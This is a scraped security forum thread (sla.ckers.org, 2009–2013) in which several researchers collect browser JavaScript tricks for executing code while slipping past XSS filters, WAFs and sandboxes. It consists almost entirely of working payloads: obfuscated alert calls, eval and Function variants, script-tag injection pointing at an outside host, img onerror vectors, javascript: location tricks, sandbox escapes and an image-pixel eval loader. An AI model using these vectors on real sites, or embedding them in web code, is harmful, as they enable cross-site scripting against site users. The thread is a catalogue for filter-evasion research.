Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Code Execution/Evaluation (rev 41)
Posted by: sirdarckcat
Date: June 08, 2009 02:29AM

/*
* I will be updating this thread when I have time with the replies.. any mods fell free to help.
*/


//Direct execution
Quote

window["alert"](1);//this["alert"],self["alert"],etc.. see references to window
Quote

self[<>alert</>](1);//JS1.6+
Quote

self[<><![CDATA[alert]]></>](1);
Quote

top/**/['\x61\x6c\x65\x72\x74']/**/(1);
Quote

\u0061lert(1),alert\u000a(1);
Quote

(ä=#1={}&&alert)(ä);//ff only
Quote

alert.valueOf().call(self,1);
Quote

[alert.valueOf()][0].valueOf()(1);
Quote

{x/*@cc_on=alert@*/}x/*@(/xss/@*/); // ie only
Quote

({__noSuchMethod__:Function}).aaaaa$$$$$$$$$dddddddfffffff_____("alert(1)")()//ff only
Quote

//ff only
location.__noSuchMethod__=location.replace;location["javascript:alert(1)"]();
window.__noSuchMethod__=setTimeout;window["alert(2)"]();
Quote

""+{toString:alert}//code execution with no [=()], doesnt work on FF with native functions
Quote

1*({valueOf:alert})//code execution with no [=()], doesnt work on FF with native functions
Quote

a setter=alert;a="hello";// function execution without [()] ff only


//Evaluate code
Quote

eval("alert(1)");
Quote

setTimeout("alert(1)");
Quote

setInterval("alert(1)");//lots of alerts..
Quote

Function("alert(1)")();
Quote

self[(typeof prompt).replace(/^./,String.toUpperCase)]("alert(1)")();
Quote

[].constructor.constructor('alert(1)')();
Quote

execScript("alert(1)");//IE only
Quote

window[<>eval</>](name);//JS1.6+
Quote

'alert("xss")'.replace(/.*/g,eval)


//Generate/add script tags
Quote

with(document)body.previousSibling.appendChild(createElement('script')).src='URL'
Quote

with(document)querySelector('head').appendChild(createElement('script')).src='URL'
Quote

with(a=<script />)a.@src='URL',a.toXMLString();//FF only, generates the string only (doesn't execute)
Quote

with(document)body.previousSibling.appendChild(createElementNS('http://www.w3.org/1999/xhtml','html:script')).src='URL'


//Virtual DOM (execution before appendChild, for escaping sandboxes)
Quote

//IE only
document.createElement("html").appendChild(document.createElement("script")).text="alert('ie sucks')";
ddocument.createElement("html").appendChild(document.createElement("script")).setAttribute('src','//0x.lv');
Quote

//WebKit only (Chrome/Safari)
document.createElementNS("http://www.w3.org/1999/xhtml","html").innerHTML='<html:head><meta http-equiv="Refresh" content="0;URL=javascript:alert(/HACKED/);"></html:head>';
Quote

//FF only
document.createElement("pre").innerHTML="<img onerror='alert(1)' src='.'/>";
with(new Image)setAttribute('onerror','alert(1)'),src='.';
with(document.createElement("img"))setAttribute('onerror','alert(1)'),setAttribute('src','.');
new Option().innerHTML="<img src='.' onerror=alert(1)>";//tip: [new Option][0][name]=location.hash // name=innerHTML location.hash=<img src...
Quote

// Opera only
new Image().src="javascript:alert(1234)";
document.createElement('img').src="javascript:alert(1234)";


//Location
Quote

location='javascript:alert(1)';
Quote

location.assign('javascript:alert(1)');
Quote

location.replace('javascript:alert(1)');
Quote

// supossing the url is http://victim/asdf/#%0aalert(1) (ie only)
location.protocol='javascript';
Quote

document.URL='javascript:alert(1)';//ie
Quote

location=Namespace('javascript:\x61lert(1)').uri//ff
Quote

frameElement.src='javascript:alert(1)';/*requires to be framed in same origin (frame a page with a frame and do frames[0].frames[0].location="xss victim")*/


//Etc..
Quote

<meta http-equiv=refresh content=,url=xss.swf>
Quote

document.styleSheets(0).cssText=name;//IE only

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 41 time(s). Last edit at 06/10/2010 09:17AM by sirdarckcat.

Options: ReplyQuote
Re: Code Execution/Evaluation
Posted by: Gareth Heyes
Date: June 08, 2009 11:13AM

IE only:-
document.styleSheets(0).cssText=name

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 10)
Posted by: sirdarckcat
Date: June 29, 2009 05:30AM

Virtual/Phantom/Ghost DOM

IE only:
document.createElement("html").appendChild(document.createElement("script")).text="alert('i suck')";

WebKit only (Chrome/Safari):
document.createElementNS("http://www.w3.org/1999/xhtml","html").innerHTML='<html:head><meta http-equiv="Refresh" content="0;URL=javascript:alert(/HACKED/);"></html:head>';

This is terrific for escaping sandboxes.

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 19)
Posted by: sirdarckcat
Date: July 02, 2009 10:33PM

added location section to the post

and I reported to webkit and gecko's teams about this stuff..

https://bugzilla.mozilla.org/show_bug.cgi?id=502173
https://bugs.webkit.org/show_bug.cgi?id=26825

hopefully they wont fix it.. haha

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 07/03/2009 03:22AM by sirdarckcat.

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 39)
Posted by: hoshikuzu
Date: September 13, 2009 02:33AM

//Location
/* hidden location method (only IE) */

[location(name)]
+location(name)
location(name)? true : false
typeof location(name)
location(name)|1
!location(name)
~~location(name)
/(?!)/(location(name))

/*do not work*/
location(name) //do not work

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 39)
Posted by: Anonymous User
Date: September 13, 2009 05:18PM

<html>
<body>
<img id="i" onload="a()" src="alert.png"/>
<canvas id="c"/>
<script>
    function a() {
        c=document.getElementById("c"),x=c.getContext("2d"),i=document.getElementById("i")
        x.drawImage(i, 0, 0),d=x.getImageData(0, 0, 3, 3),p=''
        for(y in d.data) {
            if(d.data[y] > 0 && d.data[y] < 255) {
                p+=String.fromCharCode(d.data[y])
            }
        }
        eval(p)
    }
</script>
</body>
</html>

http://img183.imageshack.us/img183/2125/alert.png

:D

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 39)
Posted by: sirdarckcat
Date: September 13, 2009 11:52PM

that would be.. ways to make a string wouldnt it?

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 39)
Posted by: Anonymous User
Date: September 14, 2009 02:49AM

Feel free to move it - I find it hard to determine what to put where sometimes.

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 39)
Posted by: sirdarckcat
Date: September 14, 2009 03:32AM

hmm, we could merge both threads in one, what do u think?

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 39)
Posted by: Gareth Heyes
Date: September 14, 2009 10:25AM

I dunno I think it makes sense as the string one should be used for stuff like:-

/test/[-1]

and this one for stuff like mario posted

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 39)
Posted by: sirdarckcat
Date: September 14, 2009 08:43PM

ok :) agreed

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 09/14/2009 08:44PM by sirdarckcat.

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 39)
Posted by: Anonymous User
Date: December 03, 2009 05:03PM

Opera 10 - what else :D

Quote

window.onload=function(){document.execCommand("inserthtml",0,"<img src=x onerror=alert(document.domain)>")}

setTimeout(/document.execCommand('inserthtml',0,"<img src=x onerror=alert(1)>")/.source)

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 39)
Posted by: sirdarckcat
Date: December 04, 2009 09:11AM

frameElement.src='javascript:...

works everywhere, nice replacement for location=..

requires to be framed in same origin (just frame a page with a frame and do frames[0].frames[0].location="xss victim")

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 40)
Posted by: SW
Date: January 25, 2010 06:21PM

^ Is this some new kind of targeted spam?


Anyways cool thread, really expanded my knowledge of js trying to figure them all out, especially these "no alnum" ones.

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 40)
Posted by: Anonymous User
Date: January 26, 2010 03:47AM

I have no idea - looks like it. Aaaaand gone!

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 40)
Posted by: sirdarckcat
Date: June 10, 2010 09:16AM

location.__noSuchMethod__=location.replace;location["javascript:alert(1)"]();
window.__noSuchMethod__=setTimeout;window["alert(2)"]();

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 41)
Posted by: Gareth Heyes
Date: June 28, 2010 09:38AM

IE7:-
document.body.setExpression("xss",'MsgBox(xss)REM 123','VBScript');

Opera:-
document.body.background='javascript:alert(1)';

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 06/29/2010 07:46AM by Gareth Heyes.

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 41)
Posted by: Gareth Heyes
Date: July 05, 2010 10:02AM

this.watch('alert(1)',eval)/++this['alert(1)']

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 41)
Posted by: Gareth Heyes
Date: July 20, 2010 08:39AM

function::['x']setter=eval;
x='alert(1)';

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 41)
Posted by: Anonymous User
Date: August 31, 2010 03:29PM

Proxy.create({get:Function('\u0061l\u0065rt\u00281\u0029')})[9999]; // FF4b5pre

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 41)
Date: September 01, 2010 03:30AM

x = '@mozilla.org/js/function'
x::['alert'](1)

x = ''
window.x::alert(1)

x = undefined
window.x::alert(1)

x = []
window.x::alert(1)

default xml namespace = '@mozilla.org/js/function'
x = undefined
x::alert(1)

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 41)
Posted by: Gareth Heyes
Date: April 15, 2011 11:34AM

document.currentScript.parentNode.innerHTML='<img src=1 onerror=alert(1)>';

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Code Execution/Evaluation (rev 41)
Posted by: hack2012
Date: June 04, 2013 08:59PM

Thanks, it's very useful for me !

For more Waf bypass Please visit my BLog:

http://www.waitalone.cn/tag/bypass

I am from China !

Options: ReplyQuote


Sorry, only registered users may post in this forum.